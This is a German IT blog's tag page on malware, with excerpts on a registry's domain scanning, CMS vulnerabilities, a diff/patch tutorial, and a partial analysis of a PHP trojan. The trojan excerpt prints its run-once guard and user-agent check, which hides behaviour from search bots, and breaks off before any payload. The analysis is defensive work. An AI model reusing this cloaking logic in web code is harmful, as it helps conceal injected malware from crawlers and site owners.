Get Adobe Flash player
Suche:    

Artikel-Schlagworte: „Malware“

« Ältere Einträge

Switch droht mit Domain Sperre

24.04.2012 | 1 Kommentar » |

Ob Switch Gebühren hortet und den Geldern mal schnell Switch Plus gründet, also Quersubvention, oder einfach sonst ihre Monopolstellung ausnutzt, ist in meinen Augen ein dreckiges Geschäft was man boykottieren sollte.

Switch hatte nun eine neue Idee wie man Leute ärgern könnte um die Sicherheit zu erhöhen in dem man über alle .ch Domains ein Viren- und Malwarescanner jagt.

Sollte nun eine Datei von solch einem Scanner als Malware erkannt werden, bekommt man ein solches Mail:
Diesen Beitrag weiterlesen »

Veröffentlicht in Internet | Schlagworte: ,

PHP Trojaner von adveconfirm.com

18.03.2012 | 13 Kommentare » |

Ich habe diverse Webseiten von einem Kollegen auf einen meiner Server verschiebt. Dabei waren plötzlich diverse Seiten von einer Ladezeit von 20 Sekunden betroffen. Also habe ich ein Blick in den Source riskiert und folgenden Code gefunden, wo ich zerstückelt hier analysiere:

if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;

Zuerst schaut der Code, ob er bereits einmal aufgeführt wurde, wenn nicht, startet er sich selbst, sonst lässt er es.
So führt sich der Code nur einmal aus.

// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";

Der Code ist kommentiert ;) Nett. Laut Kommentar erstellt es Statistiken von Bots.

if((strstr($sUserAgent, 'google') == false) // Bot comes
&& (strstr($sUserAgent, 'baidu') == false) && (strstr($sUserAgent, 'msn') == false)
&& (strstr($sUserAgent, 'opera') == false) && (strstr($sUserAgent, 'chrome') == false)
&& (strstr($sUserAgent, 'bing') == false) && (strstr($sUserAgent, 'safari') == false)
&& (strstr($sUserAgent, 'bot') == false) && (strstr($sUserAgent, 'yahoo') == false))
{

Laut Kommentar, wenn ein Bot kommt, aber die Funktion macht das Gegenteil, wenn kein Bot kommt, also ein normaler User (keine opera und safari User)…
Diesen Beitrag weiterlesen »

Veröffentlicht in Internet, Server, Sicherheit | Schlagworte: , , ,

Sicherheit von Open CMS Systemen (WordPress Bugs)

01.09.2011 | Keine Kommentare » |

Ich habe vor sehr langer Zeit einen Artikel geschrieben über Sicherheit von Open CMS Systemen (Joomla Bugs).

Damals stach Joomla noch aus der Masse hervor in dem viele unsichere Plugins (auch heute noch) existieren. Leider ist WordPress nicht mehr so sicher wie früher und es gibt viele Angreiffer die gerne auch Zeit opfern um an eine WordPress Installation zu kommen.

Das Ausmass sieht man schnell, wenn man nur schon die Sicherheitslöcher vom August anschaut, welche veröffentlicht wurden:
Diesen Beitrag weiterlesen »

Veröffentlicht in Firma, Internet, Sicherheit, WordPress | Schlagworte: , , ,

Unixbefehle Diff und Patch / PHP Trojaner zufällig finden

08.09.2010 | 1 Kommentar » |

Immer wieder gibt es Gründe, warum man sich einem Webserver bemächtigen möchte. In letzter Zeit sind PHP Trojaner sehr populär geworden.

Es erfordert nur ein unglaublich kleinen Code und kann in einem beliebigen PHP File versteckt werden.
Virenscanner und Anti-Rootits haben keine Chance sie zu finden und der User selbst muss manuell ans Werk.

Der Nutzungsbereich ist gross. Ich habe mal über ein JS:Redirect Trojaner (DE / EN) geschrieben, welcher mit einem infizierten PHP File auf den Server gebracht wurde.

Nun musste ich gestern bei einem Fremden Server ein OSCommerce neu installieren. Da sie aber auch selber Änderungen am Code machten, musste ich die Differenz rausfinden.

Also liess ich ein

diff -r /var/www/1 /var/www/2 > directories.diff

laufen. So erhalte ich welche Files nicht identisch sind und auch ob neue angelegt wurden.

Aus der Liste entnimmt man alle PHP Files und lässt sie über ein weiteren Vergleich:

diff -u /var/www/1/functions.php /var/www/2/functions.php >> changes.diff

Dann erhält man etwas wie das hier:

--- /var/www/1/functions.php 2010-09-07 11:08:55.000000000 +0200
+++ /var/www/2/functions.php 2010-09-07 11:27:18.000000000 +0200
@@ -81,6 +81,7 @@
define('BOX_HEADING_CUSTOMERS', 'Kunden');
define('BOX_CUSTOMERS_CUSTOMERS', 'Kunden');
define('BOX_CUSTOMERS_ORDERS', 'Bestellungen');
+define('BOX_CUSTOMERS_USERLEVEL', 'Userberechtigungen');
define('BOX_HEADING_LOCATION_AND_TAXES', 'Land / Steuer');
@@ -182,6 +183,10 @@
define('ENTRY_NEWSLETTER', 'Rundschreiben:');
define('ENTRY_NEWSLETTER_YES', 'abonniert');
-define('ENTRY_NEWSLETTER_NO', 'nicht abonniert');
+define('ENTRY_USERLEVEL', 'Userlevel:');
+define('ENTRY_RABATT_USER', 'User:');
+define('ENTRY_RABATT_HAENDLER', 'Händler:');
+define('ENTRY_RABATT_PREMIUM', 'Premium:');

Die @@ Linie zeigt dem Programm bei welcher Linie diese Änderungen sein sollten. Die + Linien sind neu hinzugekommen und alle – Linien gehören weg. Alle Linien ohne Angabe dienen zur Hilfe bei der Navigation. Will man die Änderungen in einer zukünftigen Version einspielen und die Linienangaben ändern sich, hat das Programm daher die Hilfsangabe und findet die richtige Stelle trotzdem.

Einspielen kann man im übrigen mit

patch -p1 < changes.diff

Nachdem ich dies ausgeführt hatte, sah ich ein recht seltsamer Codeschnippsel. Nach dem Auseinanderbeinen (Enter und Tabs einfügen) sah ich ich vor mir ein Trojaner, dieser so aus:
Diesen Beitrag weiterlesen »

Veröffentlicht in Internet, Programme, Server, Sicherheit | Schlagworte: , , , ,

Sicherheit von Open CMS Systemen (Joomla Bugs)

25.03.2010 | Keine Kommentare » |

Es gibt sehr viele verschiedene Open Source CMS Systeme im Internet.
Wordpress ist ein Open Source Projekt für Blogs wie diesen hier, um Artikel zu veröffentlichen. Das WBB ist ein Forensystem, wo sich viele User austauschen und miteinander interagieren können, Joomla ist ein CMS für Webseiteanbieter….

Diese CMS Systeme finden in immer mehr Bereichen ihren Nutzen. Fertige CMS Systeme bieten den nutzen, das die recht kostengünstig zu haben sind, eigentlich keinerlei Entwicklungskosten, ausser vielleicht Designkosten entstehen.
Weiterhin hilft meist eine grosse Community der Weiterentwicklung der eigentlichen Lösung und arbeitet immer neue Addon’s und Features aus. Auch hilft eine grosse Community normalerweise der Sicherheit der Lösungen, da die Fehler schnell von Jemandem entdeckt und behoben werden.

Leider ist dies nicht bei jeder CMS Lösung der Fall. Joomla ist leider genau beim letzten Punkt im Nachtreff. Die Lösung Joomla selbst und auch viele der weit verbreiteten Addon’s beinhalten eine viel zahl von Sicherheitslöchern und täglich kommen mehr dazu.

Wenn man die Anzahl von Sicherheitslöchern mit anderen CMS Systemen vergleicht, stickt Joomla weit von der Masse hinaus, was es für ein sehr unsichere Plattform macht. Dennoch ist es sehr weit verbreitet.

Um dies zu verdeutlichen, habe ich eine Übersicht erstellt, von Sicherheitslücken, welche in den letzten 10 Tagen aufgedeckt wurden!
Diesen Beitrag weiterlesen »

Veröffentlicht in Internet, WordPress | Schlagworte: , ,
« Ältere Einträge
Stefan
Kontaktdaten 		IT Blögg?
Ein männlicher IT Nerd durchstöbert das Web nach speziellen Gadgets, unentbehrlicher Software und Alles was man im IT Sektor nicht verpassen darf.
Stichwörter Wolke
Kategorien
Ist Ihre Webseite aktuell?
web updates kmu (wuk.ch) hat sich als Web Dienstleister auf folgende Bereiche spezialisiert:
Falls Sie Fragen zu den Produkten haben, stehen wir gerne zu Verfügung.
Impressum & Disclaimer | Dieser Blog wird von Web Updates KMU gehostet.
Copyright © 2009 IT Blögg. All Rights Reserved.